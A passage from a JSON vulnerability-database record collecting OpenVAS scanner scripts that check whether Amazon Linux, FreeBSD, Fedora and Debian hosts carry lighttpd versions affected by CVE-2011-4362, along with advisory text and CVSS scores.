0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-03-17T23:03:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120270", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120270", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2012-107)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120270\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:22:01 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2012-107)\");\n script_tag(name:\"insight\", value:\"Integer signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index.\");\n script_tag(name:\"solution\", value:\"Run yum update lighttpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2012-107.html\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"lighttpd-fastcgi\", rpm:\"lighttpd-fastcgi~1.4.31~1.2.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lighttpd-mod_mysql_vhost\", rpm:\"lighttpd-mod_mysql_vhost~1.4.31~1.2.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lighttpd-debuginfo\", rpm:\"lighttpd-debuginfo~1.4.31~1.2.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lighttpd-mod_geoip\", rpm:\"lighttpd-mod_geoip~1.4.31~1.2.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.2.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2018-10-05T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:136141256231070584", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070584", "type": "openvas", "title": "FreeBSD Ports: lighttpd", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_lighttpd7.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID c6521b04-314b-11e1-9cf4-5404a67eef98\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70584\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 11762 $\");\n script_name(\"FreeBSD Ports: lighttpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: lighttpd\n\nCVE-2011-4362\nInteger signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"lighttpd\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.4.30\")<0) {\n txt += 'Package lighttpd version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-06-28T00:00:00", "id": "OPENVAS:1361412562310864498", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864498", "type": "openvas", "title": "Fedora Update for lighttpd FEDORA-2012-9078", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2012-9078\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082686.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864498\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-28 10:35:02 +0530 (Thu, 28 Jun 2012)\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-9078\");\n script_name(\"Fedora Update for lighttpd FEDORA-2012-9078\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lighttpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"lighttpd on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2018-01-06T13:06:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "description": "Check for the Version of lighttpd", "modified": "2018-01-05T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:864513", "href": "http://plugins.openvas.org/nasl.php?oid=864513", "type": "openvas", "title": "Fedora Update for lighttpd FEDORA-2012-9040", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2012-9040\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"lighttpd on Fedora 17\";\ntag_insight = \"Secure, fast, compliant and very flexible web-server which has been optimized\n for high-performance environments. It has a very low memory footprint compared\n to other webservers and takes care of cpu-load. Its advanced feature-set\n (FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make\n it the perfect webserver-software for every server that is suffering load\n problems.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082765.html\");\n script_id(864513);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:35:35 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-9040\");\n script_name(\"Fedora Update for lighttpd FEDORA-2012-9040\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of lighttpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-04-14T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:70584", "href": "http://plugins.openvas.org/nasl.php?oid=70584", "type": "openvas", "title": "FreeBSD Ports: lighttpd", "sourceData": "#\n#VID c6521b04-314b-11e1-9cf4-5404a67eef98\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID c6521b04-314b-11e1-9cf4-5404a67eef98\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: lighttpd\n\nCVE-2011-4362\nInteger signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70584);\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-14 11:02:12 +0200 (Fri, 14 Apr 2017) $\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 5956 $\");\n script_name(\"FreeBSD Ports: lighttpd\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"lighttpd\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.4.30\")<0) {\n txt += 'Package lighttpd version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:58:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "description": "Check for the Version of lighttpd", "modified": "2017-12-29T00:00:00", "published": "2012-06-28T00:00:00", "id": "OPENVAS:864498", "href": "http://plugins.openvas.org/nasl.php?oid=864498", "type": "openvas", "title": "Fedora Update for lighttpd FEDORA-2012-9078", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2012-9078\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"lighttpd on Fedora 16\";\ntag_insight = \"Secure, fast, compliant and very flexible web-server which has been optimized\n for high-performance environments. It has a very low memory footprint compared\n to other webservers and takes care of cpu-load. Its advanced feature-set\n (FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make\n it the perfect webserver-software for every server that is suffering load\n problems.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082686.html\");\n script_id(864498);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-28 10:35:02 +0530 (Thu, 28 Jun 2012)\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-9078\");\n script_name(\"Fedora Update for lighttpd FEDORA-2012-9078\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of lighttpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "description": "The remote host is missing an update to lighttpd\nannounced via advisory DSA 2368-1.", "modified": "2017-07-07T00:00:00", "published": "2012-02-11T00:00:00", "id": "OPENVAS:70687", "href": "http://plugins.openvas.org/nasl.php?oid=70687", "type": "openvas", "title": "Debian Security Advisory DSA 2368-1 (lighttpd)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2368_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2368-1 (lighttpd)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\nXi Wang discovered that the base64 decoding routine which is used to\ndecode user input during an HTTP authentication, suffers of a signedness\nissue when processing user input. As a result it is possible to force\nlighttpd to perform an out-of-bounds read which results in Denial of\nService conditions.\n\nCVE-2011-3389\n\nWhen using CBC ciphers on an SSL enabled virtual host to communicate with\ncertain client, a so called BEAST attack allows man-in-the-middle\nattackers to obtain plaintext HTTP traffic via a blockwise\nchosen-boundary attack (BCBA) on an HTTPS session. Technically this is\nno lighttpd vulnerability. However, lighttpd offers a workaround to\nmitigate this problem by providing a possibility to disable CBC ciphers.\n\nThis updates includes this option by default. System administrators\nare advised to read the NEWS file of this update (as this may break older\nclients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\n\n\nWe recommend that you upgrade your lighttpd packages.\";\ntag_summary = \"The remote host is missing an update to lighttpd\nannounced via advisory DSA 2368-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202368-1\";\n\nif(description)\n{\n script_id(70687);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-4362\", \"CVE-2011-3389\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 03:14:22 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2368-1 (lighttpd)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "description": "The remote host is missing an update to lighttpd\nannounced via advisory DSA 2368-1.", "modified": "2019-03-18T00:00:00", "published": "2012-02-11T00:00:00", "id": "OPENVAS:136141256231070687", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070687", "type": "openvas", "title": "Debian Security Advisory DSA 2368-1 (lighttpd)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2368_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2368-1 (lighttpd)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if 